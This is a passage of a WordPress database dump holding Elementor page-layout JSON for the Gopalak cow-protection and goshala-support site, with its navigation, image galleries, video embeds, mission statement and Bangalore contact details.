,\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9455,1609,'_elementor_page_assets','a:0:{}'),(9456,1610,'_elementor_edit_mode','builder'),(9457,1610,'_elementor_template_type','wp-page'),(9458,1610,'_elementor_version','3.7.8'),(9459,1610,'_wp_page_template','elementor_canvas'),(9460,1610,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9461,1610,'_elementor_page_assets','a:0:{}'),(9578,1612,'_elementor_edit_mode','builder'),(9579,1612,'_elementor_template_type','wp-page'),(9580,1612,'_elementor_version','3.7.8'),(9581,1612,'_wp_page_template','elementor_canvas'),(9582,1612,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{